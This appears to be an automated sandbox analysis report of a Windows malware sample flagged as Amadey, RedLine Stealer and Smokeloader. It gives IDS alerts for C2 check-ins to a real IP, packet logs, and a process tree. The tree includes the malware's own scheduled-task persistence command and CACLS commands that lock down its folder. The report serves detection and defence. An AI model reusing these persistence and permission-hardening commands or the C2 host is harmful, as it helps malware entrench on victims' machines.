                            192.168.2.562.204.41.449888802027700 02/07/23-19:57:56.245210TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449806802027700 02/07/23-19:57:33.169488TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450422802027700 02/07/23-20:00:23.830241TCP2027700ET TROJAN Amadey CnC Check-In5042280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450425802027700 02/07/23-20:00:24.567398TCP2027700ET TROJAN Amadey CnC Check-In5042580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449799802027700 02/07/23-19:57:31.508216TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450244802027700 02/07/23-19:59:34.357275TCP2027700ET TROJAN Amadey CnC Check-In5024480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450333802027700 02/07/23-19:59:57.984722TCP2027700ET TROJAN Amadey CnC Check-In5033380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449908802027700 02/07/23-19:58:01.073849TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450040802027700 02/07/23-19:58:37.231251TCP2027700ET TROJAN Amadey CnC Check-In5004080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450199802027700 02/07/23-19:59:20.621768TCP2027700ET TROJAN Amadey CnC Check-In5019980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449796802027700 02/07/23-19:57:30.765231TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450288802027700 02/07/23-19:59:47.126534TCP2027700ET TROJAN Amadey CnC Check-In5028880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450308802027700 02/07/23-19:59:51.952268TCP2027700ET TROJAN Amadey CnC Check-In5030880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450158802027700 02/07/23-19:59:10.996736TCP2027700ET TROJAN Amadey CnC Check-In5015880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450028802027700 02/07/23-19:58:34.553699TCP2027700ET TROJAN Amadey CnC Check-In5002880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450069802027700 02/07/23-19:58:46.668672TCP2027700ET TROJAN Amadey CnC Check-In5006980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449920802027700 02/07/23-19:58:04.285165TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450349802027700 02/07/23-20:00:04.188949TCP2027700ET TROJAN Amadey CnC Check-In5034980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449831802027700 02/07/23-19:57:39.071348TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450219802027700 02/07/23-19:59:28.398284TCP2027700ET TROJAN Amadey CnC Check-In5021980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449701802027700 02/07/23-19:57:04.541289TCP2027700ET TROJAN Amadey CnC Check-In4970180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449742802027700 02/07/23-19:57:16.147994TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450012802027700 02/07/23-19:58:30.553987TCP2027700ET TROJAN Amadey CnC Check-In5001280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450361802027700 02/07/23-20:00:07.031777TCP2027700ET TROJAN Amadey CnC Check-In5036180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450438802027700 02/07/23-20:00:27.675588TCP2027700ET TROJAN Amadey CnC Check-In5043880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449819802027700 02/07/23-19:57:36.373215TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449949802027700 02/07/23-19:58:13.013964TCP2027700ET TROJAN Amadey CnC Check-In4994980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450142802027700 02/07/23-19:59:07.121016TCP2027700ET TROJAN Amadey CnC Check-In5014280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450101802027700 02/07/23-19:58:54.467418TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450450802027700 02/07/23-20:00:30.549660TCP2027700ET TROJAN Amadey CnC Check-In5045080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450272802027700 02/07/23-19:59:41.450711TCP2027700ET TROJAN Amadey CnC Check-In5027280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450231802027700 02/07/23-19:59:31.231345TCP2027700ET TROJAN Amadey CnC Check-In5023180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450320802027700 02/07/23-19:59:54.828975TCP2027700ET TROJAN Amadey CnC Check-In5032080192.168.2.562.204.41.4
                            TimestampSource PortDest PortSource IPDest IP
                            Feb 7, 2023 19:57:03.546092033 CET4969880192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.546333075 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.605668068 CET804969862.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.605837107 CET4969880192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.608742952 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.609515905 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.625298977 CET4969880192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.625893116 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.684655905 CET804969862.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.684715986 CET804969862.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.684825897 CET4969880192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.688357115 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.692217112 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.692430019 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.702605963 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.765177965 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.765212059 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.765239954 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.765266895 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.765290976 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.765295029 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.765325069 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.765333891 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.765357018 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.765387058 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.765396118 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.765418053 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.765439034 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.765448093 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.765480995 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.765492916 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.765548944 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.802165985 CET4969880192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.803030968 CET4969980192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.828742981 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.828780890 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.828807116 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.828826904 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.828830957 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.828857899 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.828857899 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.828885078 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.828902006 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.828911066 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.828929901 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.828936100 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.828967094 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.828972101 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.828982115 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.828999043 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.829029083 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.861804008 CET804969862.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.861861944 CET4969880192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.863467932 CET804969962.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.863574028 CET4969980192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.880243063 CET4969980192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.891520023 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.891555071 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.891587019 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.891617060 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.891618013 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.891623974 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.891650915 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.891653061 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.891674995 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.891681910 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.891702890 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.891709089 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.891721010 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.891736031 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.891761065 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.891777039 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.891787052 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.891813040 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.891813040 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.891849041 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.891874075 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.940934896 CET804969962.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.943756104 CET804969962.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.943857908 CET4969980192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.954431057 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.954458952 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.954482079 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.954504013 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.954525948 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.954547882 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.954569101 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.954591036 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.954600096 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.954613924 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.954638004 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.954653025 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.954659939 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:03.954675913 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:03.954719067 CET4969780192.168.2.562.204.41.4
                            Feb 7, 2023 19:57:04.017163992 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:04.017234087 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:04.017262936 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:04.017290115 CET804969762.204.41.4192.168.2.5
                            Feb 7, 2023 19:57:04.017316103 CET804969762.204.41.4192.168.2.5
                            • 62.204.41.4

                            Click to jump to process

                            Target ID:0
                            Start time:19:56:30
                            Start date:07/02/2023
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\file.exe
                            Imagebase:0x70000
                            File size:537600 bytes
                            MD5 hash:B16D53F153404F5825765F11AB2B6827
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low

                            Target ID:1
                            Start time:19:56:30
                            Start date:07/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
                            Imagebase:0x1080000
                            File size:346112 bytes
                            MD5 hash:E2A785D0666AFD7BBE63FAF32216A8AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 62%, ReversingLabs
                            Reputation:low

                            Target ID:2
                            Start time:19:56:31
                            Start date:07/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
                            Imagebase:0x400000
                            File size:251392 bytes
                            MD5 hash:CCFC1E2539F9382400217DF5AE6D1D8A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.338085123.0000000000676000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 49%, ReversingLabs
                            Reputation:low

                            Target ID:3
                            Start time:19:56:43
                            Start date:07/02/2023
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Imagebase:0x7ff79b0e0000
                            File size:69632 bytes
                            MD5 hash:73C519F050C20580F8A62C849D49215A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:4
                            Start time:19:56:49
                            Start date:07/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            Imagebase:0x4e0000
                            File size:11264 bytes
                            MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 82%, ReversingLabs
                            Reputation:moderate

                            Target ID:5
                            Start time:19:56:51
                            Start date:07/02/2023
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            Imagebase:0x7ff79b0e0000
                            File size:69632 bytes
                            MD5 hash:73C519F050C20580F8A62C849D49215A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:6
                            Start time:19:57:00
                            Start date:07/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            Imagebase:0x8c0000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000000.363553384.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 81%, ReversingLabs
                            Reputation:moderate

                            Target ID:7
                            Start time:19:57:01
                            Start date:07/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                            Imagebase:0xad0000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000000.365076498.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.822951926.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 81%, ReversingLabs
                            Reputation:moderate

                            Target ID:8
                            Start time:19:57:01
                            Start date:07/02/2023
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Imagebase:0xfd0000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:9
                            Start time:19:57:02
                            Start date:07/02/2023
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:10
                            Start time:19:57:02
                            Start date:07/02/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:11
                            Start time:19:57:02
                            Start date:07/02/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:12
                            Start time:19:57:02
                            Start date:07/02/2023
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:13
                            Start time:19:57:02
                            Start date:07/02/2023
                            Path:C:\Windows\SysWOW64\cacls.exe
                            Wow64 process (32bit):true
                            Commandline:CACLS "mnolyk.exe" /P "user:N"
                            Imagebase:0x11f0000
                            File size:27648 bytes
                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:14
                            Start time:19:57:02
                            Start date:07/02/2023
                            Path:C:\Windows\SysWOW64\cacls.exe
                            Wow64 process (32bit):true
                            Commandline:CACLS "mnolyk.exe" /P "user:R" /E
                            Imagebase:0x11f0000
                            File size:27648 bytes
                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:15
                            Start time:19:57:02
                            Start date:07/02/2023
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:16
                            Start time:19:57:03
                            Start date:07/02/2023
                            Path:C:\Windows\SysWOW64\cacls.exe
                            Wow64 process (32bit):true
                            Commandline:CACLS "..\4b9a106e76" /P "user:N"
                            Imagebase:0x11f0000
                            File size:27648 bytes
                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:17
                            Start time:19:57:03
                            Start date:07/02/2023
                            Path:C:\Windows\SysWOW64\cacls.exe
                            Wow64 process (32bit):true
                            Commandline:CACLS "..\4b9a106e76" /P "user:R" /E
                            Imagebase:0x11f0000
                            File size:27648 bytes
                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:18
                            Start time:19:57:03
                            Start date:07/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Imagebase:0xad0000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000002.375060444.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000000.369836464.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                            Target ID:19
                            Start time:19:57:04
                            Start date:07/02/2023
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                            Imagebase:0x1040000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:25
                            Start time:19:58:01
                            Start date:07/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Imagebase:0xad0000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000002.494123229.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000000.493543411.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                            Target ID:27
                            Start time:19:59:00
                            Start date:07/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Imagebase:0xad0000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000002.620289864.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000000.619946114.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                            Target ID:29
                            Start time:20:00:00
                            Start date:07/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Imagebase:0xad0000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000002.755532601.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000000.748563706.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                            No disassembly